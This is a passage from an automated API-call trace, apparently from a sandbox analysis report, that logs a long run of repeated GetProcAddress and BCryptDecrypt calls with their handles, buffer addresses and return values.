pbInput=0x1e890d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204cbd4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204cbd4, pcbResult=0x14f8fc) returned 0x0 [0175.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.161] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e891d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ccc9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ccc9, pcbResult=0x14f8fc) returned 0x0 [0175.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.163] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e892d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204cdbe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204cdbe, pcbResult=0x14f8fc) returned 0x0 [0175.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.164] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e893d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ceb3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ceb3, pcbResult=0x14f8fc) returned 0x0 [0175.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.165] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e894d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204cfa8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204cfa8, pcbResult=0x14f8fc) returned 0x0 [0175.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.167] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e895d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d09d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d09d, pcbResult=0x14f8fc) returned 0x0 [0175.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.168] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e896d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d192, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d192, pcbResult=0x14f8fc) returned 0x0 [0175.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.170] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e897d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d287, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d287, pcbResult=0x14f8fc) returned 0x0 [0175.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.171] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e898d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d37c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d37c, pcbResult=0x14f8fc) returned 0x0 [0175.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.173] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e899d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d471, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d471, pcbResult=0x14f8fc) returned 0x0 [0175.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.174] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d566, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d566, pcbResult=0x14f8fc) returned 0x0 [0175.293] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.293] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d65b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d65b, pcbResult=0x14f8fc) returned 0x0 [0175.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.295] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d750, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d750, pcbResult=0x14f8fc) returned 0x0 [0175.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.307] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d845, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d845, pcbResult=0x14f8fc) returned 0x0 [0175.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.311] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204d93a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204d93a, pcbResult=0x14f8fc) returned 0x0 [0175.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.313] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e89fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204da2f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204da2f, pcbResult=0x14f8fc) returned 0x0 [0175.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.315] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204db24, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204db24, pcbResult=0x14f8fc) returned 0x0 [0175.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.318] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204dc19, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204dc19, pcbResult=0x14f8fc) returned 0x0 [0175.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.320] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204dd0e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204dd0e, pcbResult=0x14f8fc) returned 0x0 [0175.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.323] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204de03, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204de03, pcbResult=0x14f8fc) returned 0x0 [0175.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.325] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204def8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204def8, pcbResult=0x14f8fc) returned 0x0 [0175.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.327] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204dfed, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204dfed, pcbResult=0x14f8fc) returned 0x0 [0175.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.329] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e0e2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e0e2, pcbResult=0x14f8fc) returned 0x0 [0175.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.331] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e1d7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e1d7, pcbResult=0x14f8fc) returned 0x0 [0175.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.333] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e2cc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e2cc, pcbResult=0x14f8fc) returned 0x0 [0175.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.335] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8a9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e3c1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e3c1, pcbResult=0x14f8fc) returned 0x0 [0175.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.337] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8aad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e4b6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e4b6, pcbResult=0x14f8fc) returned 0x0 [0175.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.479] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8abd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e5ab, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e5ab, pcbResult=0x14f8fc) returned 0x0 [0175.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.481] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8acd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e6a0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e6a0, pcbResult=0x14f8fc) returned 0x0 [0175.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.483] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8add0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e795, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e795, pcbResult=0x14f8fc) returned 0x0 [0175.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.490] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8aed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e88a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e88a, pcbResult=0x14f8fc) returned 0x0 [0175.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.493] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8afd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204e97f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204e97f, pcbResult=0x14f8fc) returned 0x0 [0175.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.495] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ea74, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ea74, pcbResult=0x14f8fc) returned 0x0 [0175.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.497] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204eb69, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204eb69, pcbResult=0x14f8fc) returned 0x0 [0175.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.499] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ec5e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ec5e, pcbResult=0x14f8fc) returned 0x0 [0175.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.501] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ed53, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ed53, pcbResult=0x14f8fc) returned 0x0 [0175.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.502] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ee48, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ee48, pcbResult=0x14f8fc) returned 0x0 [0175.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.503] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ef3d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ef3d, pcbResult=0x14f8fc) returned 0x0 [0175.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.505] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f032, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f032, pcbResult=0x14f8fc) returned 0x0 [0175.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.507] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f127, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f127, pcbResult=0x14f8fc) returned 0x0 [0175.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.509] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f21c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f21c, pcbResult=0x14f8fc) returned 0x0 [0175.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.511] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8b9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f311, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f311, pcbResult=0x14f8fc) returned 0x0 [0175.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.513] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f406, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f406, pcbResult=0x14f8fc) returned 0x0 [0175.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.515] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f4fb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f4fb, pcbResult=0x14f8fc) returned 0x0 [0175.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.516] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f5f0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f5f0, pcbResult=0x14f8fc) returned 0x0 [0175.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.517] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f6e5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f6e5, pcbResult=0x14f8fc) returned 0x0 [0175.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.724] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f7da, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f7da, pcbResult=0x14f8fc) returned 0x0 [0175.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.726] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8bfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f8cf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f8cf, pcbResult=0x14f8fc) returned 0x0 [0175.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.727] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204f9c4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204f9c4, pcbResult=0x14f8fc) returned 0x0 [0175.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.729] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204fab9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204fab9, pcbResult=0x14f8fc) returned 0x0 [0175.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.730] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204fbae, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204fbae, pcbResult=0x14f8fc) returned 0x0 [0175.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.731] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204fca3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204fca3, pcbResult=0x14f8fc) returned 0x0 [0175.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.732] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204fd98, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204fd98, pcbResult=0x14f8fc) returned 0x0 [0175.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.734] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204fe8d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204fe8d, pcbResult=0x14f8fc) returned 0x0 [0175.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.735] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ff82, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ff82, pcbResult=0x14f8fc) returned 0x0 [0175.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.738] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050077, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050077, pcbResult=0x14f8fc) returned 0x0 [0175.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.740] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205016c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205016c, pcbResult=0x14f8fc) returned 0x0 [0175.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.741] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8c9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050261, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050261, pcbResult=0x14f8fc) returned 0x0 [0175.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.743] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8cad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050356, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050356, pcbResult=0x14f8fc) returned 0x0 [0175.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.744] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8cbd0, cbInput=0x100, pPaddingInfo=0x0, 